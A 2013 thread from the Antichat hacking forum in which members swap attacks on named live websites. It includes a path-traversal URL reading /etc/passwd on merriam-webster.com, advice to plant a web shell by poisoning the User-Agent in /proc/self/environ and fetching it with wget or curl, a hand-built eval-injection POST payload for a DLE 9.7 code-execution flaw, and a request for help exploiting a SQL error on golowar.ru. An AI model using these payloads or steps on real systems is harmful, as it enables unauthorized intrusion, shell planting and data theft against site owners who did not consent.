HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.02.2013, 20:43
Vip77
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами: 7167926

Репутация: 20
По умолчанию

http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
 
Ответить с цитированием

  #2  
Старый 01.02.2013, 21:55
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Del msg
 
Ответить с цитированием

  #3  
Старый 01.02.2013, 21:57
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Vip77  
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
 
Ответить с цитированием

  #4  
Старый 01.02.2013, 23:19
zloy_fantom
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами: 7074326

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zed0x  
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
А что делать, если /proc/self/environ выглядит так:

NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULN ULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNUL

Т.е., прочитать я его могу, но, кажется, что-то с ним не так
 
Ответить с цитированием

  #5  
Старый 02.02.2013, 03:32
Vip77
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами: 7167926

Репутация: 20
По умолчанию

Цитата:
Сообщение от Zed0x  
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
там пхп не установлен походу
 
Ответить с цитированием

  #6  
Старый 02.02.2013, 19:54
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php

http://www.exploit-db.com/exploits/24444/

Смысл в том, что он под метасплоит.

Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]catlist[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]brainyfuck123[/COLOR][COLOR="#DD0000"]')||eval("echo 123;");//[/COLOR][/COLOR] 
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.

Подскажите, что делаю не так

UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть
 
Ответить с цитированием

  #7  
Старый 03.02.2013, 00:26
panfilov1991
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами: 7002326

Репутация: 0
По умолчанию

Код:
http://www.golowar.ru/news.php?id=67&page='
пишет:

Цитата:
Сообщение от None  
SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1
Проверил сайт, можно ли считать это уязвимостью?

Как дальше её раскрутить чтоб исправить!
 
Ответить с цитированием

  #8  
Старый 03.02.2013, 13:15
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zed0x  
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]catlist[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]brainyfuck123[/COLOR][COLOR="#DD0000"]')||eval("echo 123;");//[/COLOR][/COLOR] 
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD:
Форум почему-то убирает кавычку перед строкой
brainyfuck123')
, знайте что она там есть
Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.
 
Ответить с цитированием

  #9  
Старый 03.02.2013, 15:05
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

del msg
 
Ответить с цитированием

  #10  
Старый 03.02.2013, 16:32
panfilov1991
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами: 7002326

Репутация: 0
По умолчанию

не подскажите как раскрутить?

Код:
http://www.golowar.ru/news.php?id=67&page='
Цитата:
Сообщение от None  
SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1
перепробовал всё, результат одна и та же таблица
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.